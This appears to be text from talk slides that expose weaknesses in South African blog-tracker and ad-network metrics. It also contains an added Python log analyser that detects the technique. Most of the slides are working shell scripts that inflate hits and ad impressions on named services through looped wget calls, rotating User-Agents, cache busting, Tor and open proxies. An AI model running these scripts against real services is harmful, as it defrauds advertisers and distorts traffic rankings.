9. while [ 1 ]
do
  wget http://www.amatomu.com/log.php?cid=a433e87b0eb>e493dc055153ae332be0eeda46c
done;
10. Don’t crash the server!
More random log entries
#!/bin/sh
set RANDOM=$$
while [ 1 ]
do
  let "delay = RANDOM % 30"; # Random 0 to 30 second delay
  wget http://www.amatomu.com/log.php?cid=a433e87b0eb>e493dc055153ae332be0eeda46c
  echo "Waiting $delay seconds"
  sleep $delay
done;
11. #!/bin/bash
set RANDOM=$$
while [ 1 ]
do
  let "delay = RANDOM % 6";
  wget --delete-after http://afrigator.com/track/5013-none.gif
  sleep $delay;
done;
12. wget User-Agent visible in server logs
All visits from same source IP address
13. http://www.user-agent.org
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0
Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
Mozilla/5.0 (Windows; U; Windows NT 5.1; en_US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.7
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.18 Safari/525.19
14. set RANDOM=$$
while [ 1 ]
do
  let "delay = RANDOM % 30"
  let "ua = RANDOM % `wc -l useragents.txt | awk '{print $1}'` + 1"
  uastring=`sed -n ${ua}p useragents.txt;`
  wget -q --delete-after --user-agent="$uastring" http://www.amatomu.com/log.php?cid=a433e87b0eb>e493dc055153ae332be0eeda46c
  sleep $delay
done;
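Seen from the tracker's side, the tells named on slide 12 (a wget User-Agent, every hit from one source IP) and the User-Agent rotation on slide 14 are both visible in the access log. The following is an added example, not part of the original slides: it scans combined-format log lines for the tracking path and flags source IPs that send an automation User-Agent or present several different User-Agents. The function name flag_sources, the thresholds, the IP addresses and the log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Combined log format: ip, identity, user, [time], "request", status, size, "referer", "ua"
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$'
)

def flag_sources(log_text, path_prefix="/log.php", max_agents=2, min_hits=3):
    """Return {source_ip: [reasons]} for suspicious hits on the tracking path."""
    hits = defaultdict(int)
    agents = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in combined format
        ip, path, ua = m.groups()
        if path.startswith(path_prefix):
            hits[ip] += 1
            agents[ip].add(ua)
    findings = {}
    for ip, count in hits.items():
        reasons = []
        # Slide 12: the default wget User-Agent appears verbatim in the log.
        if any(ua.lower().startswith("wget/") for ua in agents[ip]):
            reasons.append("automation-user-agent")
        # Slide 14: the User-Agent changes per request, the source IP does not.
        if count >= min_hits and len(agents[ip]) > max_agents:
            reasons.append("user-agent-rotation")
        if reasons:
            findings[ip] = reasons
    return findings

# Constructed sample data (documentation IP ranges, placeholder cid); not real logs.
def _line(ip, ua):
    return (f'{ip} - - [12/Dec/2008:10:00:00 +0200] '
            f'"GET /log.php?cid=EXAMPLE HTTP/1.0" 200 43 "-" "{ua}"')

UAS = [
    "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1",
]
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", "Wget/1.11.4")] * 2        # default wget, one IP
    + [_line("198.51.100.9", ua) for ua in UAS]      # rotating agents, one IP
    + [_line("192.0.2.44", UAS[0])] * 3              # ordinary repeat visitor
)
```

Shared NAT gateways and corporate proxies legitimately put several browsers behind one address, so max_agents and min_hits need tuning against normal traffic before the rotation flag is used to discount hits.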
15. “Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location.”
--torproject.org
21. #20 of 31 “top non-US startups to watch worldwide” by Business 2.0 (money.cnn.com)
Top 10 International Products for 2008 – ReadWriteWeb
Acquired by Naspers
Blah blah blah…
WTF? Security Anyone?
22. Invitations to launches
More traffic (ironic, isn’t it?)
Gadgets for review
Press accreditation
Fake a career as a social media expert
Social engineering hack
23. Ad network linking bloggers and advertisers
Revenue based on CPM (ad impressions)
CPM is horribly broken
24. <!--/* Adgator.co.za Javascript Tag v2.6.3 */-->
<script type='text/javascript'><!--//<![CDATA[
  var m3_u = (location.protocol=='https:'?'https://ads.adgator.co.za/delivery/ajs.php':'http://ads.adgator.co.za/delivery/ajs.php');
  var m3_r = Math.floor(Math.random()*99999999999);
  if (!document.MAX_used) document.MAX_used = ',';
  document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
  document.write ("?zoneid=471");
  document.write ('&cb=' + m3_r);
  if (document.MAX_used != ',') document.write ("&exclude=" + document.MAX_used);
  document.write (document.charset ? '&charset='+document.charset : (document.characterSet ? '&charset='+document.characterSet : ''));
  document.write ("&loc=" + escape(window.location));
  if (document.referrer) document.write ("&referer=" + escape(document.referrer));
  if (document.context) document.write ("&context=" + escape(document.context));
  if (document.mmm_fo) document.write ("&mmm_fo=1");
  document.write ("'></scr"+"ipt>");
//]]>--></script><noscript><a href='http://ads.adgator.co.za/delivery/ck.php?n=ad677422&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ad677422' border='0' alt='' /></a></noscript>
Only care about ad image:
http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f
25. No ads are served to wget??
OpenX Ad Server
If no cookie gets set, then no ad gets served
Certain User Agents are ignored
First ad served, but no ads thereafter (caching?)
Geo-targeting
26. Accept cookies (and turf them)
&cb=RANDOM parameter (Cache blocking)
tor nodes in ZA?
Zombie TelkomADSL botnet?
Open proxy servers – Proof of Concept
27. let "delay = RANDOM % 40" # Up to 40 second delay – let’s not be greedy
let "prand = RANDOM % `wc -l proxies.txt | awk '{print $1}'` + 1"
http_proxy=`sed -n ${prand}p proxies.txt;` # select a random proxy
let "ua = RANDOM % `wc -l useragents.txt | awk '{print $1}'` + 1"
uastring=`sed -n ${ua}p useragents.txt;` # random useragent
let "rand = RANDOM % 999999999" # random integer for cache blocking
if [ $http_proxy == "tsocks" ]; then # 1/3rd of the time route through tor
  export http_proxy=
  /usr/bin/tsocks /usr/local/bin/wget --no-clobber --no-cache --max-redirect=0 --user-agent="$uastring" --referer=http://ramboguy.co.za "http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"
else # otherwise request the ad straight through the SA proxy
  /usr/bin/wget -d --no-clobber --no-cache --user-agent="$uastring" --referer=http://ramboguy.co.za "http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"
fi